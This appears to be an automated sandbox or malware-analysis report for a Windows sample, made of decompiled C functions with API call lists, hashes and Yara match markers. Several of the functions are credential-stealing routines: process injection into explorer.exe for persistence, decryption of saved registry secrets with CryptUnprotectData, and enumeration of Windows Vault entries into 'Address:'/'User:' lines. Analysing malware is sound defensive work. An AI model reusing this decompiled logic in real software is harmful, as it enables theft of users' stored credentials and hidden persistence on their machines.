                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _t28;
                                    				intOrPtr _t41;
                                    				intOrPtr _t45;
                                    				intOrPtr _t50;
                                    				intOrPtr _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __eflags;
                                    				_t48 = __esi;
                                    				_t47 = __edi;
                                    				_t50 = _t51;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_push(_t50);
                                    				_push(0x405607);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_push(_t50);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_v8 = 0x100;
                                    				E00402074( &_v12, _v8);
                                    				GetUserNameA(E00401F48(_v12),  &_v8); // executed
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
                                    				_push(_v16);
                                    				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
                                    				_pop(_t28);
                                    				E00401E94(_t28, _v20);
                                    				_t45 = 0x4055b2;
                                    				 *[fs:eax] = _t45;
                                    				_push(E0040560E);
                                    				return E00401AE4( &_v20, 3);
                                    			}

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
                                    				signed char _t5;
                                    
                                    				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(007A0000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
                                    				long _t2;
                                    				void* _t3;
                                    				void* _t4;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t3 =  *0x40e590; // 0x7a0000
                                    				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
                                    				return _t4;
                                    			}

                                    APIs
                                    • RtlAllocateHeap.NTDLL(007A0000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 33%
                                    			E00401139(void* __eax) {
                                    				signed int _t2;
                                    				void* _t4;
                                    				signed int _t5;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t4 =  *0x40e590; // 0x7a0000
                                    				_t5 = HeapFree(_t4, _t2 & 0x00000001, ??); // executed
                                    				asm("sbb eax, eax");
                                    				return  ~_t5 & 0x0000007f;
                                    			}

                                    APIs
                                    • HeapFree.KERNEL32(007A0000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				struct _PROCESS_INFORMATION _v24;
                                    				struct _STARTUPINFOA _v92;
                                    				char _v96;
                                    				intOrPtr _t21;
                                    				void* _t44;
                                    				intOrPtr* _t50;
                                    				intOrPtr _t53;
                                    				void* _t62;
                                    
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v96 = 0;
                                    				_push(_t62);
                                    				_push(0x40b8fa);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62 + 0xffffffa4;
                                    				_t50 =  *0x40d204; // 0x40e8f8
                                    				E00401D9C( &_v96, "_PERSIST",  *_t50);
                                    				_t44 = E00403568(0, 0, E00401F48(_v96));
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t44);
                                    					_t21 =  *0x40d1cc; // 0x40e924
                                    					_t59 = E00401F9C(_t21);
                                    					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
                                    						E00403738();
                                    						E00403738();
                                    						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
                                    						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
                                    					}
                                    				} else {
                                    					CloseHandle(_t44);
                                    				}
                                    				_pop(_t53);
                                    				 *[fs:eax] = _t53;
                                    				_push(E0040B901);
                                    				return E00401AC0( &_v96);
                                    			}

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				int _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				int _v32;
                                    				int _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char _v48;
                                    				intOrPtr _v52;
                                    				char _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				long _t168;
                                    				long _t238;
                                    				long _t251;
                                    				char* _t259;
                                    				signed int _t260;
                                    				intOrPtr _t262;
                                    				intOrPtr _t323;
                                    				intOrPtr _t326;
                                    				intOrPtr _t327;
                                    				long _t339;
                                    				long _t340;
                                    				intOrPtr _t343;
                                    				intOrPtr _t344;
                                    				void* _t350;
                                    
                                    				_t350 = __fp0;
                                    				_t341 = __esi;
                                    				_t343 = _t344;
                                    				_t262 = 0xd;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t262 = _t262 - 1;
                                    				} while (_t262 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t262;
                                    				_push(__esi);
                                    				_v12 =  *_t1;
                                    				_t259 = __edx;
                                    				_v8 = __eax;
                                    				E0040302C(_v8);
                                    				_push(_t343);
                                    				_push(0x4092a7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t344;
                                    				E00401AC0( &_v80);
                                    				_v16 = 0;
                                    				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
                                    					_v28 = 0x400;
                                    					_t341 = E00401174(_v28);
                                    					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
                                    						_v28 = 0x400;
                                    						_t339 = E00402E08();
                                    						__eflags = _t339;
                                    						if(_t339 >= 0) {
                                    							_t340 = _t339 + 1;
                                    							_t260 = 0;
                                    							__eflags = 0;
                                    							do {
                                    								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
                                    								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
                                    								_push(_v36);
                                    								E00402FBC();
                                    								_t344 = _t344 + 4;
                                    								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
                                    								__eflags = _t238;
                                    								if(_t238 == 0) {
                                    									_v44 = _v40;
                                    									_v48 = _v36;
                                    									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
                                    									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
                                    									_push( &_v56);
                                    									_push(1);
                                    									_push(0);
                                    									_push(0);
                                    									_push( &_v64);
                                    									_push(0);
                                    									_t251 =  &_v48;
                                    									_push(_t251);
                                    									L004086F0();
                                    									__eflags = _t251;
                                    									if(_t251 != 0) {
                                    										_push(_v80);
                                    										_push("Address: ");
                                    										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    										_push(_v88);
                                    										_push(0x4092d4);
                                    										E00401E10();
                                    										_push(_v80);
                                    										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
                                    										_push(_v92);
                                    										_push(0x4092e0);
                                    										E00401E10();
                                    									}
                                    								}
                                    								_t260 = _t260 + 1;
                                    								_t340 = _t340 - 1;
                                    								__eflags = _t340;
                                    							} while (_t340 != 0);
                                    						}
                                    						E00403738();
                                    						_t57 =  &_v16;
                                    						 *_t57 = _v16 + 1;
                                    						__eflags =  *_t57;
                                    					}
                                    				}
                                    				RegCloseKey(_v24);
                                    				L17:
                                    				while(E0040202C(0x4092e0, _v80) > 0) {
                                    					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
                                    					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
                                    					E00401D9C( &_v100, 0x4092e0, _v72);
                                    					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
                                    					E00401B58( &_v80, _v96);
                                    					__eflags = E0040202C(0x4092ec, _v72) - 1;
                                    					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
                                    					E00401E94(_v104, "Address");
                                    					if(__eflags == 0) {
                                    						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
                                    						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    						while(1) {
                                    							_t168 = E0040202C(0x4092d4, _v72);
                                    							__eflags = _t168;
                                    							if(_t168 <= 0) {
                                    								goto L17;
                                    							}
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							_push(_v68);
                                    							_push(0x4092d4);
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
                                    							_push(_v108);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							__eflags = E0040202C(0x4092d4, _v72) - 1;
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
                                    							_push(_v112);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401D58( &_v76, 0x4092e0);
                                    						}
                                    					}
                                    				}
                                    				E00401B14(_v12, _v76);
                                    				_pop(_t323);
                                    				 *[fs:eax] = _t323;
                                    				_push(E004092AE);
                                    				E00401AE4( &_v112, 7);
                                    				E00402108( &_v84);
                                    				E00401AE4( &_v80, 4);
                                    				_t326 =  *0x408e34; // 0x408e38
                                    				E00402FC8( &_v40, _t326);
                                    				E00401AC0( &_v20);
                                    				_t327 =  *0x408730; // 0x408734
                                    				return E00402FC8( &_v8, _t327);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				intOrPtr _v117;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t81;
                                    				void* _t86;
                                    				intOrPtr _t121;
                                    				void* _t160;
                                    				void* _t175;
                                    				void* _t187;
                                    				void* _t189;
                                    				short* _t191;
                                    				intOrPtr _t198;
                                    				intOrPtr _t203;
                                    				void* _t226;
                                    				void* _t233;
                                    				signed int _t234;
                                    				void* _t236;
                                    				intOrPtr* _t238;
                                    				intOrPtr _t240;
                                    				intOrPtr _t241;
                                    
                                    				_t174 = __ebx;
                                    				_v117 = _v117 + __edx;
                                    				_t240 = _t241;
                                    				_t175 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t175 = _t175 - 1;
                                    				} while (_t175 != 0);
                                    				_push(_t175);
                                    				_push(__ebx);
                                    				_t236 = __eax;
                                    				_push(_t240);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t241;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t238 = _t236;
                                    				_t233 = 0x25;
                                    				_t81 =  &_v151;
                                    				_t191 =  &_v114;
                                    				do {
                                    					 *_t191 = 0 << 2;
                                    					_t191 = _t191 + 2;
                                    					_t81 = _t81 + 1;
                                    					_t233 = _t233 - 1;
                                    				} while (_t233 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t86 = _v12 - 1;
                                    				if(_t86 >= 0) {
                                    					_v40 = _t86 + 1;
                                    					_t234 = 0;
                                    					do {
                                    						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
                                    						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t121 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t238);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t174 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t238);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
